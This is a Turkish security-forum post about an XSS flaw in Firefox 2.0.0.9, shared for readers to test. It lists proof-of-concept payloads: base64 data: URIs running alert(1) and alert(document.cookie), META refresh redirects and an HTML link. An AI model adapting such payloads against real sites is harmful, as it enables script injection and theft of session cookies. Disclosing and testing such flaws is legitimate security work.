Mozilla Firefoxta Yeni Bir Açık Daha (2.0.0.9)

PC güvenliği konusundaki bilgi paylaşım alanıdır.
Cevapla
Kullanıcı avatarı
velociraptor
Yottabyte4
Yottabyte4
Mesajlar: 54241
Kayıt: 14 Mar 2006, 02:33
cinsiyet: Erkek
Teşekkür etti: 20182 kez
Teşekkür edildi: 12106 kez

Mozilla Firefoxta Yeni Bir Açık Daha (2.0.0.9)

Mesaj gönderen velociraptor »

Gün geçmiyorki yeni açıklar çıkmasın. Bu seferki açıkta Firefox'ta bulundu. Son sürümü geçtigimiz haftalarda çıkmasına ragmen firefox üzerinde XSS kodlarının çalıstırılabildigi gözlendi. Bu açıgı test edebilmeniz için altta bazı örnek kodlar paylastım. XSS kodunuzu bu adresten base64 koduna çevirip alttaki gibi adres çubugunda deneyebilirsiniz Firefox'un yeni sürümü yakın zamanda çıkabilir.

Alttaki kodları Firefox'un adres çubuguna yapıstırıp deneyebilirsiniz.

1.(<script>alert(1);</script> base64'e çevirilmis hali altta. Adres çubuguna yapıstırıp deneyebilirsiniz.)

2.data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=

3.(<script>alert(document.cookie)</script> base64'e çevirilmis hali altta. Adres çubuguna yapıstırıp deneyebilirsiniz.)

4.data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

5.<META http-equiv="refresh" content="5;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">

6.data:text/html,<script>alert(1)</script>

7.data:text/cmd;,test

Veya alttaki kodları html olarak kaydedip te denemeniz mümkün.


1.<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">XSS</a>

2.<META http-equiv="refresh" content="3;URL=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">

Kaynak: eno7 | http://eno7.org
Cevapla